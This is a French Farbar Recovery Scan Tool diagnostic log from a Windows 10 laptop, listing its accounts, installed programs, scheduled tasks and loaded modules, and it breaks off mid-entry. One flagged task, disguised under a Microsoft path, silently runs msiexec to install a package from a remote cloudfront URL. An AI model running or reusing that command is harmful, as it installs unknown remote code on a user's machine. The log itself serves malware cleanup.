Résultats de l'Analyse supplémentaire de Farbar Recovery Scan Tool (x64) Version: 24-05-2017 Exécuté par Hélène (27-05-2017 17:24:14) Exécuté depuis C:\Users\Hélène\Desktop Windows 10 Home Version 1607 (X64) (2016-08-21 09:52:34) Mode d'amorçage: Normal ========================================================== ==================== Comptes: ============================= Administrateur (S-1-5-21-2158510626-1631502160-3854817698-500 - Administrator - Disabled) DefaultAccount (S-1-5-21-2158510626-1631502160-3854817698-503 - Limited - Disabled) HomeGroupUser$ (S-1-5-21-2158510626-1631502160-3854817698-1004 - Limited - Enabled) Hélène (S-1-5-21-2158510626-1631502160-3854817698-1005 - Administrator - Enabled) => C:\Users\Hélène Invité (S-1-5-21-2158510626-1631502160-3854817698-501 - Limited - Disabled) ==================== Centre de sécurité ======================== (Si un élément est inclus dans le fichier fixlist.txt, il sera supprimé.) AV: Avira Antivirus (Enabled - Up to date) {B3F630BD-538D-1B4A-14FA-14B63235278F} AV: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46} AS: Avira Antivirus (Enabled - Up to date) {0897D159-75B7-14C4-2E4A-2FC449B26D32} AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46} ==================== Programmes installés ====================== (Seuls les logiciels publicitaires ('adware') avec la marque 'caché' ('Hidden') sont susceptibles d'être ajoutés au fichier fixlist.txt pour qu'ils ne soient plus masqués. Les programmes publicitaires devront être désinstallés manuellement.) 64 Bit HP CIO Components Installer (Version: 7.2.8 - Hewlett-Packard) Hidden Adobe Acrobat Reader DC - Français (HKLM-x32\...\{AC76BA86-7AD7-1036-7B44-AC0F074E4100}) (Version: 17.009.20044 - Adobe Systems Incorporated) Apple Application Support (32 bits) (HKLM-x32\...\{7FE25256-B7C1-480D-B736-10A67A833AEA}) (Version: 3.2 - Apple Inc.) Apple Application Support (64 bits) (HKLM\...\{B255D495-4734-4E9B-B4F5-96702FD4A7B9}) (Version: 3.2 - Apple Inc.) Apple Software Update (HKLM-x32\...\{789A5B64-9DD9-4BA5-915A-F0FC0A1B7BFE}) (Version: 2.1.3.127 - Apple Inc.) Avira Antivirus (HKLM-x32\...\Avira Antivirus) (Version: 15.0.26.48 - Avira Operations GmbH & Co. KG) Avira Connect (HKLM-x32\...\{897e4d08-9554-48e9-ba07-ce6040867fa3}) (Version: 1.2.83.46341 - Avira Operations GmbH & Co. KG) Avira Connect (x32 Version: 1.2.83.46341 - Avira Operations GmbH & Co. KG) Hidden Bonjour (HKLM\...\{6E3610B2-430D-4EB0-81E3-2B57E8B9DE8D}) (Version: 3.0.0.10 - Apple Inc.) BufferChm (x32 Version: 140.0.298.000 - Hewlett-Packard) Hidden CCleaner (HKLM\...\CCleaner) (Version: 5.30 - Piriform) Copy (x32 Version: 140.0.298.000 - Hewlett-Packard) Hidden CyberLink PowerDirector 10 (HKLM-x32\...\InstallShield_{B0B4F6D2-F2AE-451A-9496-6F2F6A897B32}) (Version: 10.0.0.2810 - CyberLink Corp.) CyberLink PowerDirector 10 (Version: 10.0.0.2810 - CyberLink Corp.) Hidden D3DX10 (x32 Version: 15.4.2368.0902 - Microsoft) Hidden Dependency Package Update (Version: 1.6.25.00 - Lenovo Inc.) Hidden Dependency Package Update (Version: 1.6.29.00 - Lenovo Inc.) Hidden Dependency Package Update (Version: 1.6.38.00 - Lenovo Inc.) Hidden Dependency Package Update (x32 Version: 1.6.32.00 - Lenovo Group Limited) Hidden Dependency Package Update (x32 Version: 1.6.38.00 - Lenovo Group Limited) Hidden Dependency Package Update (x32 Version: 1.6.38.01 - Lenovo Group Limited) Hidden Destinations (x32 Version: 140.0.253.000 - Hewlett-Packard) Hidden DeviceDiscovery (x32 Version: 140.0.298.000 - Hewlett-Packard) Hidden DJ_AIO_06_F4500_SW_MIN (x32 Version: 140.0.851.000 - Hewlett-Packard) Hidden Dolby Digital Plus Home Theater (HKLM\...\{7E3D8FA1-6092-469A-955B-68FC4A2C67CA}) (Version: 7.3.2.2 - Dolby Laboratories Inc) Energy Manager (HKLM-x32\...\InstallShield_{AC768037-7079-4658-AC24-2897650E0ABE}) (Version: 1.0.1.38 - Lenovo) Energy Manager (x32 Version: 1.0.1.38 - Lenovo) Hidden F4500 (x32 Version: 140.0.851.000 - Hewlett-Packard) Hidden Galerie de photos (x32 Version: 16.4.3528.0331 - Microsoft Corporation) Hidden Google Chrome (HKLM-x32\...\{677D1ADF-1617-34D4-ADDF-D0F8DEC40FAF}) (Version: 58.0.3029.110 - Google, Inc.) Google Chrome (HKLM-x32\...\Google Chrome) (Version: 58.0.3029.110 - Google Inc.) Google Update Helper (x32 Version: 1.3.33.5 - Google Inc.) Hidden GPBaseService2 (x32 Version: 140.0.297.000 - Hewlett-Packard) Hidden Guide de l’utilisateur (x32 Version: 1.0.0.15 - Lenovo) Hidden HP Customer Participation Program 14.0 (HKLM\...\HPExtendedCapabilities) (Version: 14.0 - HP) HP Deskjet F4500 All-in-One Driver Software 14.0 Rel. 6 (HKLM\...\{FD126052-310E-4364-937B-6B5564F24578}) (Version: 14.0 - HP) HP Imaging Device Functions 14.0 (HKLM\...\HP Imaging Device Functions) (Version: 14.0 - HP) HP Solution Center 14.0 (HKLM\...\HP Solution Center & Imaging Support Tools) (Version: 14.0 - HP) HP Update (HKLM-x32\...\{912D30CF-F39E-4B31-AD9A-123C6B794EE2}) (Version: 5.005.002.002 - Hewlett-Packard) HPDiagnosticAlert (x32 Version: 1.00.0001 - Microsoft) Hidden HPPhotoGadget (x32 Version: 140.0.524.000 - Hewlett-Packard) Hidden HPProductAssistant (x32 Version: 140.0.298.000 - Hewlett-Packard) Hidden HPSSupply (x32 Version: 140.0.297.000 - Hewlett-Packard) Hidden Intel Experience Center - Configuration (x32 Version: 1.9.0.8 - Intel) Hidden Intel(R) Dynamic Platform and Thermal Framework (HKLM-x32\...\FFD10ECE-F715-4a86-9BD8-F6F47DA5DA1C) (Version: 7.1.0.2103 - Intel Corporation) Intel(R) Experience Center Desktop Software (HKLM-x32\...\{85de612b-ee05-476a-87cc-52e5740de420}) (Version: 1.9.0.8 - Intel) Intel(R) Management Engine Components (HKLM-x32\...\{65153EA5-8B6E-43B6-857B-C6E4FC25798A}) (Version: 9.5.13.1706 - Intel Corporation) Intel(R) Processor Graphics (HKLM-x32\...\{F0E3AD40-2BBD-4360-9C76-B9AC9A5886EA}) (Version: 20.19.15.4531 - Intel Corporation) Intel(R) PROSet/Wireless Software for Bluetooth(R) Technology(patch version 3.0.1337.1) (HKLM\...\{302600C1-6BDF-4FD1-1307-148929CC1385}) (Version: 3.1.1307.0362 - Intel Corporation) Intel(R) Rapid Storage Technology (HKLM\...\{409CB30E-E457-4008-9B1A-ED1B9EA21140}) (Version: 12.8.0.1016 - Intel Corporation) Intel(R) Smart Connect Technology (HKLM\...\{939CD3F2-0EFA-4CE5-8164-1245F364EDD5}) (Version: 4.2.40.2418 - Intel Corporation) Intel(R) Update Manager (HKLM-x32\...\{7224B7CE-196C-4E2A-A1AE-1D7BF259FD36}) (Version: 3.4.1942 - Intel Corporation) Lenovo EasyCamera (HKLM-x32\...\Sunplus SPUVCb) (Version: 3.4.5.35 - SunplusIT) Lenovo Motion Control (HKLM-x32\...\InstallShield_{A800D2BF-2F0D-4899-B265-C91C90981E8C}) (Version: 2.0.0.0829 - PointGrab) Lenovo Motion Control (x32 Version: 2.0.0.0829 - PointGrab) Hidden Lenovo OneKey Recovery (HKLM-x32\...\InstallShield_{46F4D124-20E5-4D12-BE52-EC177A7A4B42}) (Version: 8.0.0.2105 - CyberLink Corp.) Lenovo OneKey Recovery (Version: 8.0.0.2105 - CyberLink Corp.) Hidden Lenovo Smart Voice (HKLM\...\Lenovo SmartVoice) (Version: 1.0.2.0 - Lenovo) Lenovo System Interface Foundation (HKLM\...\{C2E5CA37-C862-4A69-AC6D-24F450A20C16}) (Version: 1.0.076.00 - Lenovo) Lenovo Transition (HKLM\...\Lenovo Transition) (Version: 2.0.13.8301 - Lenovo) Lenovo Yoga PhoneCompanion (HKLM-x32\...\InstallShield_{0F82EA83-B0C5-4AB9-9695-DFE92C5FD57B}) (Version: 1.1.9.3 - Lenovo) Lenovo Yoga PhoneCompanion (x32 Version: 1.1.9.3 - Lenovo) Hidden Logiciel Intel® PROSet/Wireless (HKLM-x32\...\{e1172fd4-a6d9-4cfa-8256-268f728fec31}) (Version: 16.5.3 - Intel Corporation) MarketResearch (x32 Version: 140.0.212.000 - Hewlett-Packard) Hidden Microsoft Office Professionnel Plus 2013 (HKLM\...\Office15.PROPLUS) (Version: 15.0.4569.1506 - Microsoft Corporation) Microsoft OneDrive (HKU\S-1-5-21-2158510626-1631502160-3854817698-1005\...\OneDriveSetup.exe) (Version: 17.3.6799.0327 - Microsoft Corporation) Microsoft OneDrive (HKU\S-1-5-21-2158510626-1631502160-3854817698-1005-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-05272017162446547\...\OneDriveSetup.exe) (Version: 17.3.6799.0327 - Microsoft Corporation) Microsoft Silverlight (HKLM\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 5.1.50906.0 - Microsoft Corporation) Microsoft SQL Server 2005 Compact Edition [ENU] (HKLM-x32\...\{F0B430D1-B6AA-473D-9B06-AA3DD01FD0B8}) (Version: 3.1.0000 - Microsoft Corporation) Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation) Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation) Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation) Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation) Microsoft Visual C++ 2010 x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation) Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation) Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}) (Version: 11.0.61030.0 - Microsoft Corporation) Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}) (Version: 11.0.61030.0 - Microsoft Corporation) Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (HKLM-x32\...\{050d4fc8-5d48-4b8f-8972-47c82c46020f}) (Version: 12.0.30501.0 - Microsoft Corporation) Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (HKLM-x32\...\{f65db027-aff3-4070-886a-0d87064aabb1}) (Version: 12.0.30501.0 - Microsoft Corporation) Microsoft Visual C++ 2015 Redistributable (x64) - 14.0.23026 (HKLM-x32\...\{e46eca4f-393b-40df-9f49-076faf788d83}) (Version: 14.0.23026.0 - Microsoft Corporation) Microsoft Visual C++ 2015 Redistributable (x86) - 14.0.23026 (HKLM-x32\...\{74d0e5db-b326-4dae-a6b2-445b9de1836e}) (Version: 14.0.23026.0 - Microsoft Corporation) Microsoft Visual Studio 2010 Tools for Office Runtime (x64) (HKLM\...\Microsoft Visual Studio 2010 Tools for Office Runtime (x64)) (Version: 10.0.50903 - Microsoft Corporation) Module linguistique Microsoft Visual Studio 2010 Tools pour Office Runtime (x64) - FRA (HKLM\...\Microsoft Visual Studio 2010 Tools for Office Runtime (x64) Language Pack - FRA) (Version: 10.0.50903 - Microsoft Corporation) Movavi Video Editor 12 (HKLM-x32\...\Movavi Video Editor 12) (Version: 12.3.1 - Movavi) Movie Maker (x32 Version: 16.4.3528.0331 - Microsoft Corporation) Hidden NETGEAR Genie (HKLM-x32\...\NETGEAR Genie) (Version: 2.3.1.25 - NETGEAR Inc.) Network64 (Version: 140.0.306.000 - Hewlett-Packard) Hidden Nitro Pro 8 (HKLM\...\{ED5FEF26-DEC5-446F-AEB2-E0979D4139F9}) (Version: 8.5.5.7 - Nitro) Outils de vérification linguistique 2013 de Microsoft Office - Français (Version: 15.0.4569.1506 - Microsoft Corporation) Hidden Package de pilotes Windows - Lenovo (ACPIVPC) System (02/17/2013 9.52.0.776) (HKLM\...\35DD26BE48DAF4A9F35F969F3CB1E3E1435E661E) (Version: 02/17/2013 9.52.0.776 - Lenovo) Package de pilotes Windows - Lenovo (WUDFRd) LenovoVhid (07/25/2013 10.30.0.288) (HKLM\...\6BCA401E9CBEED970D75F55FA5320F60D11984E9) (Version: 07/25/2013 10.30.0.288 - Lenovo) Picasa 3 (HKLM-x32\...\Picasa 3) (Version: 3.9 - Google, Inc.) Realtek Card Reader (HKLM-x32\...\{5BC2B5AB-80DE-4E83-B8CF-426902051D0A}) (Version: 6.2.9200.30164 - Realtek Semiconductor Corp.) Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.7040 - Realtek Semiconductor Corp.) ReminderInstaller (HKLM-x32\...\InstallShield_{48B99BC9-CEB0-485E-96B1-4609BC86D2DE}) (Version: 1.00.0000 - Absolute Software.) ReminderInstaller (x32 Version: 1.00.0000 - Absolute Software.) Hidden Scan (x32 Version: 140.0.253.000 - Hewlett-Packard) Hidden Service Pack 1 for Microsoft Office 2013 (KB2850036) 64-Bit Edition (HKLM\...\{90150000-0011-0000-1000-0000000FF1CE}_Office15.PROPLUS_{D82063A8-7C8C-4C3B-A9BB-95138CA55D26}) (Version: - Microsoft) Service Pack 1 for Microsoft Office 2013 (KB2850036) 64-Bit Edition (Version: - Microsoft) Hidden Shop for HP Supplies (HKLM\...\Shop for HP Supplies) (Version: 14.0 - HP) Smart View (HKLM-x32\...\{D9E784FC-3C9A-44E9-A48A-9DCBBF11CA90}) (Version: 1.0.0.0 - Samsung ) SolutionCenter (x32 Version: 140.0.299.000 - Hewlett-Packard) Hidden Sony Mobile Update Engine (HKLM-x32\...\Update Engine) (Version: 2.15.13.201509231442 - Sony Mobile Communications Inc.) Spotify (HKU\S-1-5-21-2158510626-1631502160-3854817698-1005\...\Spotify) (Version: 1.0.52.725.g943b26a8 - Spotify AB) Spotify (HKU\S-1-5-21-2158510626-1631502160-3854817698-1005-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-05272017162446547\...\Spotify) (Version: 1.0.52.725.g943b26a8 - Spotify AB) Status (x32 Version: 140.0.342.000 - Hewlett-Packard) Hidden Synaptics Pointing Device Driver (HKLM\...\SynTPDeinstKey) (Version: 19.0.9.5 - Synaptics Incorporated) Toolbox (x32 Version: 140.0.596.000 - Hewlett-Packard) Hidden TrayApp (x32 Version: 140.0.297.000 - Hewlett-Packard) Hidden Update for Skype for Business 2015 (KB3191873) 64-Bit Edition (HKLM\...\{90150000-012B-040C-1000-0000000FF1CE}_Office15.PROPLUS_{D6E29338-0D16-4873-8F8B-0DED5CDD4B67}) (Version: - Microsoft) Update for Skype for Business 2015 (KB3191876) 64-Bit Edition (HKLM\...\{90150000-0011-0000-1000-0000000FF1CE}_Office15.PROPLUS_{63B92B9B-BAA1-4708-BB4B-216BB5FD6322}) (Version: - Microsoft) Update for Skype for Business 2015 (KB3191876) 64-Bit Edition (HKLM\...\{90150000-00C1-0000-1000-0000000FF1CE}_Office15.PROPLUS_{63B92B9B-BAA1-4708-BB4B-216BB5FD6322}) (Version: - Microsoft) Update for Skype for Business 2015 (KB3191876) 64-Bit Edition (HKLM\...\{90150000-012B-040C-1000-0000000FF1CE}_Office15.PROPLUS_{63B92B9B-BAA1-4708-BB4B-216BB5FD6322}) (Version: - Microsoft) UserGuide (HKLM-x32\...\InstallShield_{F07C2CF8-4C53-4EC3-8162-A6221E36EB88}) (Version: 1.0.0.15 - Lenovo) VLC media player (HKLM-x32\...\VLC media player) (Version: 2.2.1 - VideoLAN) Web Launch Recorder (HKU\S-1-5-21-2158510626-1631502160-3854817698-1005\...\WebLaunchRecorder) (Version: 2.0 - ) Web Launch Recorder (HKU\S-1-5-21-2158510626-1631502160-3854817698-1005-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-05272017162446547\...\WebLaunchRecorder) (Version: 2.0 - ) WebReg (x32 Version: 140.0.297.017 - Hewlett-Packard) Hidden Windows 10 Update and Privacy Settings (HKLM\...\{293F2009-0145-450B-B4AA-063D43FB368C}) (Version: 1.0.13.0 - Microsoft Corporation) Windows Live (HKLM-x32\...\WinLiveSuite) (Version: 16.4.3528.0331 - Microsoft Corporation) WinRAR 5.11 (32-bit) (HKLM-x32\...\WinRAR archiver) (Version: 5.11.0 - win.rar GmbH) Xperia Companion (HKLM-x32\...\{8d53ad63-24f0-4f9e-bb4f-53c7d69a67d6}) (Version: 1.5.3.0 - Sony) Xperia Companion (x32 Version: 1.5.3.0 - Sony) Hidden Yoga Picks (HKLM-x32\...\{267C8BA0-876B-4589-9F14-EFB84ABCEA7F}) (Version: 1.00.013.0731 - Lenovo) ==================== Personnalisé CLSID (Avec liste blanche): ========================== (Si un élément est inclus dans le fichier fixlist.txt, il sera supprimé du Registre. Le fichier ne sera pas déplacé, sauf s'il est inscrit séparément.) ==================== Tâches planifiées (Avec liste blanche) ============= (Si un élément est inclus dans le fichier fixlist.txt, il sera supprimé du Registre. Le fichier ne sera pas déplacé, sauf s'il est inscrit séparément.) Task: {0AC24CCA-9874-49BD-8874-7568BAFB156F} - System32\Tasks\Safer-Networking\Spybot - Search and Destroy\Scan the system => C:\Program Files (x86)\Spybot - Search & Destroy 2\SDScan.exe [2016-03-21] (Safer-Networking Ltd.) Task: {271116CB-AE18-43A0-A420-0FE1E56D7704} - \Microsoft\Windows\Setup\gwx\launchtrayprocess -> Pas de fichier <==== ATTENTION Task: {352E6CA0-7314-4DF4-89C4-682368D80D57} - System32\Tasks\Microsoft\Windows\Workplace Join\Automatic-Workplace-Join => %SystemRoot%\System32\AutoWorkplace.exe Task: {389BBE1F-4D7D-41D5-8311-6A4B8E14DCFE} - System32\Tasks\Microsoft\Office\Office 15 Subscription Heartbeat => C:\Program Files\Common Files\Microsoft Shared\Office15\OLicenseHeartbeat.exe [2014-01-23] (Microsoft Corporation) Task: {394F8D7F-149A-49E3-8B99-70542EC3A2DE} - \Microsoft\Windows\Setup\GWXTriggers\Logon-5d -> Pas de fichier <==== ATTENTION Task: {4A522BB3-5C5D-4887-991D-16C2270A9E98} - System32\Tasks\Lenovo\ImController\Lenovo iM Controller Scheduled Maintenance => Sc.exe START ImControllerService Task: {4ACFFD61-6BB5-419A-B5AC-7764F2C62D20} - System32\Tasks\Lenovo\Dependency Package Auto Update => C:\Program Files\Lenovo\iMController\AutoUpdate.exe [2015-12-14] () Task: {4FC83DAF-6374-4E07-99E8-83B3667B223C} - System32\Tasks\IUM-F1E24CA0-B63E-4F13-A9E3-4ADE3BFF3473-Logon => C:\Program Files (x86)\Intel\Intel(R) Update Manager\bin\iumsvc.exe [2016-08-12] (Intel Corporation) Task: {4FEE1EE1-6B64-4B87-BFC3-7E65BF0AD669} - System32\Tasks\Microsoft\Windows\DeviceSettings\Datuther => msiexec.exe /i hxxp://D2bUH1bF1g584W.clOuDfroNt.net/mmtsk/occup.php?p=SAMSUNGXMZMTD256HAGM-000L1_S15GNYADB21631&d=20170514 /q <==== ATTENTION Task: {541FDE98-B045-49E2-9EE0-9A2527CA48BF} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2017-05-27] (Google Inc.) Task: {5801A124-DE19-4696-9AA5-6823900D989F} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentFallBack => C:\Program Files\Microsoft Office\Office15\msoia.exe [2014-01-23] (Microsoft Corporation) Task: {5CCA86E2-345B-4264-A36E-C03F99404652} - \Microsoft\Windows\Setup\GWXTriggers\MachineUnlock-5d -> Pas de fichier <==== ATTENTION Task: {5D10584D-D93C-46A9-84B7-6C6A1FF692DF} - \{F26AE424-45C1-538F-CF94-EADEF2EF78E6} -> Pas de fichier <==== ATTENTION Task: {60AB5BF6-B0C1-4611-B448-EC3603E7945B} - System32\Tasks\Lenovo\ImController\Plugins\LenovoSystemUpdatePlugin_WeeklyTask => reg.exe add hklm\SOFTWARE\Lenovo\SystemUpdatePlugin\scheduler /v start /t reg_dword /d 1 /f /reg:32 Task: {647CD2C7-DF2F-44CD-BA0E-93CF2EBC8968} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2017-05-27] (Google Inc.) Task: {67D929A3-2489-4645-B982-038377AE9848} - \Microsoft\Windows\Setup\gwx\refreshgwxconfigandcontent -> Pas de fichier <==== ATTENTION Task: {6C5D4629-0156-4D94-AA58-72F968C9803D} - System32\Tasks\Synaptics TouchPad Enhancements => C:\Program Files\Synaptics\SynTP\SynTPEnh.exe [2015-06-03] (Synaptics Incorporated) Task: {6D544B47-EE7A-4CE0-901E-7A915D9751A5} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [2017-04-25] (Adobe Systems Incorporated) Task: {75A78CD1-8E59-454E-B553-C33D07FF7703} - System32\Tasks\IUM-F1E24CA0-B63E-4F13-A9E3-4ADE3BFF3473 => C:\Program Files (x86)\Intel\Intel(R) Update Manager\bin\iumsvc.exe [2016-08-12] (Intel Corporation) Task: {85AE3694-CAC5-42FF-9341-4725E6570ED7} - \Microsoft\Windows\Setup\GWXTriggers\OutOfIdle-5d -> Pas de fichier <==== ATTENTION Task: {8A05CE4B-A63A-4C94-A687-FD30FFC52C6D} - System32\Tasks\Safer-Networking\Spybot - Search and Destroy\Check for updates => C:\Program Files (x86)\Spybot - Search & Destroy 2\SDUpdate.exe [2014-06-27] (Safer-Networking Ltd.) Task: {9403744D-ABE6-4440-90F1-C6D92D1EE5F2} - System32\Tasks\CCleanerSkipUAC => C:\Program Files\CCleaner\CCleaner.exe [2017-05-05] (Piriform Ltd) Task: {9621490F-B723-4F2E-AE78-6BAD7ADB3709} - \Microsoft\Windows\Setup\gwx\refreshgwxcontent -> Pas de fichier <==== ATTENTION Task: {9C7655D2-FD29-4E58-B28E-82D9CD8BCE3E} - \Microsoft\Windows\Setup\GWXTriggers\OutOfSleep-5d -> Pas de fichier <==== ATTENTION Task: {A2517193-BEF9-4673-8025-4DAAD3A68FF3} - \Microsoft\Windows\Setup\GWXTriggers\ScheduleUpgradeReminderTime -> Pas de fichier <==== ATTENTION Task: {AA2B947A-8BEB-4517-8136-CDA6F07EDC50} - System32\Tasks\Lenovo\ImController\TimeBasedEvents\9b9a9029-44f8-4296-aa47-f42f7cae7437 => C:\Program Files\Lenovo\ImController\Service\Lenovo.Modern.ImController.exe [2017-04-25] (Lenovo Group Limited) Task: {AFFE4F8C-20C9-4D8B-8970-619F11E647C6} - System32\Tasks\Apple\AppleSoftwareUpdate => C:\Program Files (x86)\Apple Software Update\SoftwareUpdate.exe [2011-06-01] (Apple Inc.) Task: {C352697F-D0DF-4321-B113-BA08930A6ACD} - \{781FFF5E-D8C4-07E6-5747-90C2DB30EF46} -> Pas de fichier <==== ATTENTION Task: {CA11E374-6B20-4F11-9E1D-EF6256E747C2} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentLogOn => C:\Program Files\Microsoft Office\Office15\msoia.exe [2014-01-23] (Microsoft Corporation) Task: {CB3171BB-7912-4C88-8C09-2AC5D9FFAA39} - \Microsoft\Windows\Setup\GWXTriggers\ScheduleUpgradeTime -> Pas de fichier <==== ATTENTION Task: {CC7E2359-39B5-4418-A69F-404B0BEA0810} - System32\Tasks\Safer-Networking\Spybot - Search and Destroy\Refresh immunization => C:\Program Files (x86)\Spybot - Search & Destroy 2\SDImmunize.exe [2016-03-21] (Safer-Networking Ltd.) Task: {CD5B6DA9-8DA3-4F1E-9379-729500CF5970} - System32\Tasks\Microsoft\Windows\RemovalTools\MRT_HB => C:\windows\system32\MRT.exe [2017-05-24] (Microsoft Corporation) Task: {DE0886FA-2A63-4E3F-9FE6-51CCEF637E45} - \Microsoft\Windows\Setup\gwx\refreshgwxconfig -> Pas de fichier <==== ATTENTION Task: {DE626651-C925-4D06-A428-8893A4C8D8BD} - \Microsoft\Windows\Setup\GWXTriggers\refreshgwxconfig-B -> Pas de fichier <==== ATTENTION Task: {E25DBFF9-AA1C-4632-B667-C138C5663EC6} - \Microsoft\Windows\Setup\GWXTriggers\OnIdle-5d -> Pas de fichier <==== ATTENTION Task: {E9E4A70B-8F9C-482E-8641-0F04B51893D2} - System32\Tasks\Lenovo\ImController\TimeBasedEvents\f055a383-e533-426c-9496-24d63823f3b5 => C:\Program Files\Lenovo\ImController\Service\Lenovo.Modern.ImController.exe [2017-04-25] (Lenovo Group Limited) Task: {F30D5260-58EA-469A-94DB-705E5EF45655} - System32\Tasks\Lenovo\ImController\TimeBasedEvents\1c30971b-7ae9-472a-aa5a-63a6e86e8e79 => C:\Program Files\Lenovo\ImController\Service\Lenovo.Modern.ImController.exe [2017-04-25] (Lenovo Group Limited) Task: {FE1B02FC-1FDC-4D9A-94CA-8F33E2F78BD5} - \Microsoft\Windows\Setup\GWXTriggers\Time-5d -> Pas de fichier <==== ATTENTION (Si un élément est inclus dans le fichier fixlist.txt, le fichier tâche (.job) sera déplacé. Le fichier exécuté par la tâche ne sera pas déplacé.) Task: C:\WINDOWS\Tasks\CreateExplorerShellUnelevatedTask.job => C:\WINDOWS\explorer.exe ==================== Raccourcis ============================= (Les éléments sont susceptibles d'être inscrits dans le fichier fixlist.txt afin d'être supprimés ou restaurés.) ShortcutWithArgument: C:\Users\Hélène\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\ImplicitAppShortcuts\9501e18d7c2ab92e\Google Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> --profile-directory="Profile 2" ==================== Modules chargés (Avec liste blanche) ============== 2016-07-16 13:42 - 2016-07-16 13:42 - 00231424 _____ () C:\WINDOWS\SYSTEM32\ism32k.dll 2017-05-11 17:18 - 2017-04-28 02:49 - 02681200 _____ () C:\WINDOWS\system32\CoreUIComponents.dll 2013-12-27 21:51 - 2012-04-25 04:43 - 00390632 _____ () C:\Program Files\CyberLink\Shared files\RichVideo64.exe 2014-07-24 15:47 - 2014-07-24 15:47 - 00061200 _____ () C:\ProgramData\LenovoTransition\Server\x64\dptf.dll 2017-05-11 17:18 - 2017-04-28 02:49 - 02681200 _____ () C:\WINDOWS\SYSTEM32\CoreUIComponents.dll 2016-09-16 09:48 - 2016-09-07 06:56 - 00134656 _____ () C:\Windows\ShellExperiences\Windows.UI.Shell.SharedUtilities.dll 2017-03-15 20:20 - 2017-03-04 08:31 - 00474112 _____ () C:\Windows\ShellExperiences\QuickActions.dll 2017-05-26 15:17 - 2017-05-26 15:17 - 00074752 _____ () C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.16.595.0_x64__kzf8qxf38zg5c\SkypeHost.exe 2017-05-26 15:17 - 2017-05-26 15:17 - 00201728 _____ () C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.16.595.0_x64__kzf8qxf38zg5c\SkypeBackgroundTasks.dll 2017-05-26 15:17 - 2017-05-26 15:17 - 43202048 _____ () C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.16.595.0_x64__kzf8qxf38zg5c\SkyWrap.dll 2017-05-26 15:17 - 2017-05-26 15:17 - 02442752 _____ () C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.16.595.0_x64__kzf8qxf38zg5c\skypert.dll 2013-12-27 21:53 - 2014-07-24 15:47 - 00294672 _____ () C:\Program Files (x86)\Lenovo\Lenovo Transition\Transition.exe 2013-12-27 21:53 - 2014-07-24 15:47 - 00108304 _____ () C:\Program Files (x86)\Lenovo\Lenovo Transition\TransitionServer.exe 2017-05-05 18:07 - 2017-05-05 18:07 - 00077824 _____ () C:\Program Files\CCleaner\lang\lang-1036.dll 2017-05-27 16:11 - 2017-05-09 11:13 - 03767640 _____ () C:\Program Files (x86)\Google\Chrome\Application\58.0.3029.110\libglesv2.dll 2017-05-27 16:11 - 2017-05-09 11:13 - 00100696 _____ () C:\Program Files (x86)\Google\Chrome\Application\58.0.3029.110\libegl.dll 2017-03-15 20:21 - 2017-03-04 08:12 - 09760768 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\CortanaApi.dll 2017-03-15 20:21 - 2017-03-04 08:05 - 01401856 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.Core.dll 2017-03-15 20:21 - 2017-03-04 08:05 - 00757248 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\CSGSuggestLib.dll 2017-05-11 17:18 - 2017-04-28 01:36 - 01033216 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.Actions.dll 2017-05-11 17:18 - 2017-04-28 01:36 - 02424320 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.BackgroundTask.dll 2017-05-11 17:18 - 2017-04-28 01:37 - 04853760 _____ () 